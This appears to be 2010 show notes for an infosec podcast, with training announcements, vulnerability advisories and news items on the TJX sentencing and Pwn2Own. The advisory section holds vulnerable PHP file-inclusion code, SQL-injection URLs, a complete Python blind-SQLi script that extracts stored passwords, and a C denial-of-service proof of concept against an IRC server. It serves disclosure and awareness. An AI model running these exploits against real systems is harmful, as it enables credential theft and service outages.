ISD Podcast Episode 96 for March 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
- Washington DC – April 12th to 16th
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton
SANS Community Atlanta:
- SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Notacon 7
- April 15th – 18th, 2010 Cleveland, Ohio
- http://notacon.org/
- Adrian will be there presenting on Anti-Forensics
Kentuckiana Metasploit Class
- May 8, 2010 Jeffersonville, Indiana
- (No URL for that as of yet)
- Proceeds with be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:
Webhosting services:WebSpeedway
Vulnerabilities of Interest:
-
- justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability. Vulnerable code: <?php
ob_start();//;print_r($_GET);
error_reporting(E_ALL);
function __autoload($class_name){
$f=realpath(‘..’).’/classes/’.$class_name.’.php’;
if (file_exists($f))
require_once $f ;
else {
die(‘File ‘.$f.’ does not exist. Referer:
‘.(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] :
‘none’).’<br/>’);
}
}
Config::init();
>
$xmldb=XmlDb::getInstance();
>
$selfname=basename($_SERVER['PHP_SELF'],’.php’);
if(isset($_GET['p']) && !empty($_GET['p'])) {
//$selfname=basename($_GET['p'],’.php’);
$selfname=str_replace(‘.php’,”,$_GET['p']);$filepath=dirname(dirname($_SERVER['SCRIPT_FILENAME'])).’/control/’.$selfn
ame.’.php’;//echo
$selfname;
if(!file_exists($filepath)) {
include ‘../control/defaultcontrol.php’;
}
else
include ‘../control/’.$selfname.’.php’;
}
Proof of Concept is available: http://www.sample.com/index.php?p=[LFI] - Joomla component com_universal (UWCMS Universal Web CMS) is subject to a Remote File Inclusion (RFI) vulnerability. This affects version 1.0.0. Vulnerable code: /includes/config/config.html.php
global $mosConfig_absolute_path;
require_once($mosConfig_absolute_path.”/administrator/components/com_
universal/includes/config/configuracion.php”);Proof of Concept is available: http://www.sample.com/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]
- N-13 News is subject to a File Disclosure vulnerability. Example URL is available: http://www.sample.com/modules/login.php?default_login_language={FILE}
- CF Image Hosting Script is subject to a File Disclosure vulnerability. Version 1.0 is impacted. Example URL is available: http://www.sample.com/?img=../{FILE}
- Easy-Clanpage is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Easy-Clanpage 2.2 and versions prior to and including Easy-Clanpage 2.0 are vulnerable; other versions may be affected as well.Example URL is available: http://www.sample.com/[path]/?section=user&action=details&id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
http://www.sample.com/ecp_version2/?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1The following exploit is available:
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getoptdef out(str):
sys.stdout.write(str)
sys.stdout.flush()class Exploit:
charset = “0123456789abcdefABCDEF”
url = “”
charn = 1
id = 1
table_prefix = “”
table_field = “”
passwd = “”
columns = []
find_passwd = Truedef __init__(self):
if len(sys.argv) < 2:
print “*****************************************************************************”
print “******************** Easy-Clanpage V2.0 Profil Page Hack ********************”
print “*****************************************************************************”
print “* Discovered and vulnerability by Easy Laster *”
print “* coded by Dr.ChAoS *”
print “*****************************************************************************”
print “* Usage: *”
print “* python exploit.py [OPTION...] [SWITCH...] <url> *”
print “* *”
print “* Example: *”
print “* *”
print “* Get the password of the user with id 2: *”
print “* python exploit.py -id 2 http://site.de/ecp/ *”
print “* *”
print “* Get email and username of id 1: *”
print “* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *”
print “* *”
print “* Switches: *”
print “* –nopw Search no password *”
print “* *”
print “* Options: *”
print “* –id=<user id> User id *”
print “* –prefix=<table prefix> Table prefix of ECP *”
print “* –columns=<max_chars:column_name,…> Get value of any column you want *”
print “*****************************************************************************”
exit()
opts, switches = getopt.getopt(sys.argv[1:], “”, ["id=", "prefix=", "columns=", "nopw"])
for opt in opts:
if opt[0] == “–id”:
self.id = int(opt[1])
elif opt[0] == “–prefix”:
self.table_prefix = opt[1]
elif opt[0] == “–columns”:
for col in opt[1].split(“,”):
max, name = col.split(“:”)
self.columns.append([max, name, ""])
elif opt[0] == “–nopw”:
self.find_passwd = False
for switch in switches:
if switch[:4] == “http”:
if switch[-1:] == “/”:
self.url = switch
else:
self.url = switch + “/”
def generate_url(self, ascii):
return self.url + “index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20″ + self.table_field + “%20FROM%20″ + self.table_prefix + “ecp_user%20WHERE%20userID=” + str(self.id) + “%20LIMIT%200,1),” + str(self.charn) + “,1))%3E” + str(ord(ascii))
def start(self):
print “Exploiting…”
if self.find_passwd:
self.password()
if len(self.columns) > 0:
self.read_columns()
print “All finished!\n”
print “—— Results ——”
if len(self.columns) > 0:
for v in self.columns:
print “Column \”" + v[1] + “\”: ” + v[2]
if self.find_passwd:
if len(self.passwd) == 32:
print “Password: ” + self.passwd
else:
print “Password not found!”
print “——————–”
def read_columns(self):
end = False
charrange = [0]
charrange.extend(range(32, 256))
for i in range(len(self.columns)):
out(“Getting value of \”" + self.columns[i][1] + “\”: “)
self.table_field = self.columns[i][1]
for pwc in range(1, int(self.columns[i][0]) + 1):
if end == True:
break
self.charn = pwc
end = False
for c in charrange:
src = urllib2.urlopen(self.generate_url(chr(c))).read()
if “<b>Warning</b>: mysql_result() [" in src:
if c == 0:
end = True
else:
self.columns[i][2] += chr(c)
out(chr(c))
break
out(“\n”)
def password(self):
out(“Getting password: “)
self.table_field = “password”
for pwc in range(1, 33):
self.charn = pwc
for c in self.charset:
src = urllib2.urlopen(self.generate_url(c)).read()
if “<b>Warning</b>: mysql_result() [" in src:
self.passwd += c
out(c)
break
out("\n")exploit = Exploit()
exploit.start() - JINAIS is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. INAIS 0.1.8 is vulnerable; other versions may also be affected. Exploit code is available:
/*
Jinais IRC Server 0.1.8 - NULL Pointer PoCThis PoC will disconnect the affected target IRC server using
a NULL Pointer vulnerability.Copyright 2010 Salvatore Fresta aka Drosophila
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version
2 of the License, or (at your option) any later version.This program is distributed in the hope that it will be
useful, but WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.You should have received a copy of the GNU General Public
License along with this program; if not, write to the Free
Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
MA 02111-1307 USAhttp://www.gnu.org/licenses/gpl-2.0.txt
*/
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#define close closesocket
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#endif#define BUFF_SIZE 256
#define DEFAULT_PORT 4002int socket_connect(char *server, int port);
char *socket_receive(int sock, int tout);
int socket_send(int socket, char *buffer, size_t size);
int socket_close(int socket);int main(int argc, char *argv[]) {
int sd,
rnd_num,
len,
port = DEFAULT_PORT;
char pkg[BUFF_SIZE],
*response = NULL,
*host = NULL;if(argc < 2) {
printf(“\nJinais IRC Server 0.1.8 NULL Pointer PoC – (c) Salvatore Fresta”
“\nhttp://www.salvatorefresta.net”
“\n”
“\nUsage: %s <target_hostname> <port> (default: %d)\n\n”, argv[0], port);
return -1;
}srand(time(NULL));
host = argv[1];
if(argc > 2) port = atoi(argv[2]);printf(“\nJinais IRC Server 0.1.8 NULL Pointer PoC – (c) Salvatore Fresta”
“\nhttp://www.salvatorefresta.net”
“\n\n[*] Connecting to %s:%hu…”, host, port);sd = socket_connect(host, port);
if(sd < 0) {
printf(“\n[-] Error on connect!\n\n”);
return -1;
}printf(“\n[+] Connection estabilished”
“\n[*] Loggin to IRC server…”);login:
rnd_num = rand()%100+1;
len = snprintf(pkg, sizeof(pkg), “NICK randomnickname%d\r\n”, rnd_num);
if(len < 0 || len > sizeof(pkg)) {
perror(“\n[-] Error: snprintf”);
socket_close(sd);
return -1;
}if(socket_send(sd, pkg, len) < 0) {
perror(“\n[-] Error: socket_send”);
socket_close(sd);
return -1;
}response = socket_receive(sd, 3);
if(!response) {
perror(“\n[-] Error: socket_receive”);
socket_close(sd);
return -1;
}if(strstr(response, “Nickname is already in use”)) {
free(response);
goto login;
}
free(response);printf(“\n[+] Login successfully”
“\n[*] Data sending…”);rnd_num = rand()%100+1;
len = snprintf(pkg, sizeof(pkg), “USER blabla\r\nTOPIC #ch%d\r\n”, rnd_num);
if(len < 0 || len > sizeof(pkg)) {
perror(“\n[-] Error: snprintf”);
socket_close(sd);
return -1;
}if(socket_send(sd, pkg, len) < 0) {
perror(“\n[-] Error: socket_send”);
socket_close(sd);
return -1;
}response = socket_receive(sd, 3);
if(!response) {
perror(“\n[-] Error: socket_receive”);
socket_close(sd);
return -1;
}socket_close(sd);
printf(“\n[+] Data sent successfully”
“\n[+] Connection closed\n\n”);return 0;
}
int socket_connect(char *server, int port) {
int sd;
struct sockaddr_in sock;
struct hostent *host = NULL;#ifdef WIN32
WSADATA wsadata;
if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
#endifmemset(&sock, 0, sizeof(sock));
if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);if(!(host=gethostbyname(server))) return -1;
sock.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
return sd;
}
char *socket_receive(int sock, int tout) {
int ret,
byte_recv,
oldpkglen = 0,
pkglen = 0;
char *buffer = NULL,
tmp[128];
struct timeval timeout;
fd_set input;if(sock < 0) return NULL;
while (1) {
FD_ZERO(&input);
FD_SET(sock, &input);if(tout > 0) {
timeout.tv_sec = tout;
timeout.tv_usec = 0;
ret = select(sock + 1, &input, NULL, NULL, &timeout);
}
else
ret = select(sock + 1, &input, NULL, NULL, NULL);if (!ret) break;
if (ret < 0) return NULL;byte_recv = recv(sock, tmp, sizeof(tmp), 0);
if(byte_recv < 0) return NULL;
if(!byte_recv) break;
oldpkglen = pkglen;
pkglen += byte_recv;buffer = (char *) realloc(buffer, pkglen+1);
if(!buffer) return NULL;
memcpy(buffer+oldpkglen, tmp, byte_recv);
}
if(buffer) buffer[pkglen] = 0;
return buffer;
}
int socket_send(int socket, char *buffer, size_t size) {
if(socket < 0) return -1;
return send(socket, buffer, size, 0) < 0 ? -1 : 0;
}
int socket_close(int socket) {
if(socket < 0) return -1;
return close(socket) < 0 ? -1 : 0;
}
- New-CMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. New-CMS 1.21 and prior are vulnerable. Example URL is available: http://www.sample.com/index.php?pg=[LFI]
- From the Pwn2Own Contest: Microsoft Internet Explorer is subject to multiple unspecified remote code-execution vulnerabilities. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. The vulnerabilities affect Internet Explorer 8; other versions may be vulnerable as well. The researcher responsible for discovering these issues has developed exploit code to trigger the vulnerabilities. This exploit code is not known to be publicly available.
- From the Pwn2Own Contest: Apple Safari is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. This vulnerability affects Apple Safari 4 versions running on the Mac OS X platform; other versions may be vulnerable as well. The researcher responsible for discovering this issue has developed exploit code to trigger this vulnerability. This exploit code is not known to be publicly available.
- justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability. Vulnerable code: <?php
Stories of Interest:
News item 1: http://www.wired.com/threatlevel/2010/03/tjx-sentencing/
Convicted TJX hacker Albert Gonzalez was sentenced to 20 years in prison on Thursday for leading a gang of cyberthieves who stole more than 90 million credit and debit card numbers from TJX and other retailers.
The sentence for the largest computer-crime case ever prosecuted is the lengthiest ever imposed in the United States for hacking or identity-theft. Gonzalez was also fined $25,000. Restitution, which will likely be in the tens of millions, was not decided Thursday.
Clean-cut, wearing a beige jail uniform and wireframe glasses, the 28-year-old Gonzalez sat motionless at his chair during Thursday’s proceedings, his hands folded in front of him.
Before the sentence was pronounced, Gonzalez told the court he deeply regrets his crimes, and is remorseful for having taken advantage of the personal relationships he’d forged. “Particularly one I had with a certain government agency – that gave me a second chance in life,” said the hacker, who had worked as a paid informant for the Secret Service. “I blame nobody but myself.”
News item 2: http://www.nytimes.com/2010/03/21/world/asia/21grid.html
It came as a surprise this month to Wang Jianwei, a graduate engineering student in Liaoning, China, that he had been described as a potential cyberwarrior before the United States Congress.
Larry M. Wortzel, a military strategist and China specialist, told the House Foreign Affairs Committee on March 10th that it should be concerned because “Chinese researchers at the Institute of Systems Engineering of Dalian University of Technology published a paper on how to attack a small U.S. power grid sub-network in a way that would cause a cascading failure of the entire U.S.”
When reached by telephone, Mr. Wang said he and his professor had indeed published “Cascade-Based Attack Vulnerability on the U.S. Power Grid” in an international journal called Safety Science last spring. But Mr. Wang said he had simply been trying to find ways to enhance the stability of power grids by exploring potential vulnerabilities.
“We usually say ‘attack’ so you can see what would happen,” he said. “My emphasis is on how you can protect this. My goal is to find a solution to make the network safer and better protected.” And independent American scientists who read his paper said it was true: Mr. Wang’s work was a conventional technical exercise that in no way could be used to take down a power grid.
News item 3: http://www.computerworld.com/s/article/9174078/iPhone_Safari_IE8_Firefox_all_fall_on_day_one_of_Pwn2Own?taxonomyId=17
Hackers took down Apple’s iPhone and Safari browser, Microsoft’s Internet Explore 8 (IE8) and Mozilla’s Firefox within minutes at today’s Pwn2Own contest, as expected.
The two-man team of Vincenzo Iozzo and Ralf-Philipp Weinmann exploited the iPhone in under five minutes, said a spokeswoman for 3Com TippingPoint, the security company that sponsored the contest. The pair also walked away with $15,000 in cash, a record prize for the challenge, which is in its fourth year.
Iozzo, an Italian college student, works for Zynamics GmbH, the company headed by noted researcher Thomas Dullien, better known as Halvar Flake, while Weinmann is a post-doctoral researcher at the Laboratory of Algorithms, Cryptology and Security at the University of Luxembourg.
Weinmann is probably best known for being part of a three-man team that in 2007 demonstrated how to crack the Wi-Fi security protocol WEP much faster than previously thought possible.
News item 4: https://www.infosecisland.com/articleview/3392-Durex-condom-orders-exposed-on-the-Internet.html
Earlier we talked about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing. The orders had not been placed on the kohninoorpassion.com web site, but on the Durex India e-store site.
From what the customer could determine, the earliest order exposed online dated back to February 23, 2009, but there is no confirmation as to for how long the customer records might have been accessible without a login. According to the customer’s web site about the breach, no credit card or financial data were exposed.
The customer reported that he promptly contacted TTK-LIG (the marketer of the Durex brand in India and manufacturer of Kohinoor condoms) and SSL International (the owner of the Durex brand worldwide) about the problem and that by the next day, the site appeared to be better secured. But that wasn’t the end of the story, it seems. The customer created his own web site and FAQ about the breach and has been updating it since then. A review of the updates suggest that things took an ugly turn within a matter of weeks.
